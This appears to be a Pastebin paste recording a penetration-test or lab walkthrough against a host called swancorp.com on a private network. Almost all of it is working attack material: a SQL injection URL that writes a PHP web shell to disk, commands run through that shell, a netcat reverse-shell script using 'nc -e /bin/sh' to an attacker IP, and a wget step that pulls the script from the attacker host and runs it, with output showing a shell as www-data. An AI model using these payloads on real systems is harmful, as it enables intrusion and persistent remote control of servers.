API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jan 28th, 2020
154
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.73 KB | None | 0 0
raw download clone embed print report
  1. Using php scripting manipulation through the SQL access, used the following script code to create a backdoor file called backdoor.php
  2.  
  3. http://swancorp.com/swancorp/timecards/edit_type.php?type_id=740%20union%20all%20select%20%22%3C?php%20echo%20shell_exec($_GET[%27cmd%27]);?%3E%22%20into%20OUTFILE%20%27/var/www/html/swancorp/backdoor.php%27;#
  4.  
  5. Then used following the php scripts to get differing results:
  6.  
  7. Directory list
  8. http://swancorp.com/swancorp/backdoor.php?cmd=ls
  9.  
  10. about.html backdoor.php cache contact.html css evilbackdoor.php fonts images index.html js nagios_exploit.sh portfolio.html sass swancorp.sh timecards
  11.  
  12. Router info
  13. http://swancorp.com/swancorp/backdoor.php?cmd=route
  14.  
  15. Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface default 10.10.127.1 0.0.0.0 UG 0 0 0 eth0 10.10.0.0 * 255.255.0.0 U 0 0 0 eth0
  16.  
  17. Linux version
  18. http://swancorp.com/swancorp/backdoor.php?cmd=cat /etc/issue
  19.  
  20. Ubuntu 14.04.5 LTS \n \l
  21.  
  22.  
  23. Using the following backdoor commands through the host shell first and then the target php access next, attempted to get a connection from the target system to the host system.
  24.  
  25. nc -lvp 12345
  26.  
  27. http://swancorp.com/swancorp/backdoor.php?cmd=nc 10.10.127.89 12345
  28.  
  29. root@kali-linux:~# nc -lvp 12345
  30. listening on [any] 12345 ...
  31. connect to [10.10.127.89] from swancorp.com [10.10.127.209] 54630
  32.  
  33.  
  34. Made a script file containing the code:
  35. #!/bin/sh
  36. nc.traditional -e /bin/sh 10.10.127.89 12345
  37.  
  38. This was to enable a constant connection between host and target machines
  39.  
  40. Then used the following php command to have the script downloaded:
  41. http://swancorp.com/swancorp/backdoor.php?cmd=wget -P /tmp/ http://10.10.127.89/ncscript.sh
  42.  
  43. Verified that the file was successfully transfered to the target system using:
  44. http://swancorp.com/swancorp/backdoor.php?cmd=ls /tmp/
  45.  
  46. hsperfdata_tomcat7 index.html ncscript tomcat7-tomcat7-tmp vmware-root
  47.  
  48. Then modified the script file's permissions on the target system using:
  49. http://swancorp.com/swancorp/backdoor.php?cmd=chmod 777 /tmp/ncscript
  50.  
  51. Executed the script using the command:
  52. http://swancorp.com/swancorp/backdoor.php?cmd=sh /tmp/ncscript
  53.  
  54. Used simple terminal commands to verify that the connection is constant.
  55.  
  56. whoami
  57. www-data
  58.  
  59. ifconfig
  60. eth0 Link encap:Ethernet HWaddr 00:50:56:b8:1e:8e
  61. inet addr:10.10.127.209 Bcast:10.10.255.255 Mask:255.255.0.0
  62. inet6 addr: fe80::250:56ff:feb8:1e8e/64 Scope:Link
  63. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
  64. RX packets:921352 errors:0 dropped:1113 overruns:0 frame:0
  65. TX packets:113252 errors:0 dropped:0 overruns:0 carrier:0
  66. collisions:0 txqueuelen:1000
  67. RX bytes:124236261 (124.2 MB) TX bytes:11509356 (11.5 MB)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!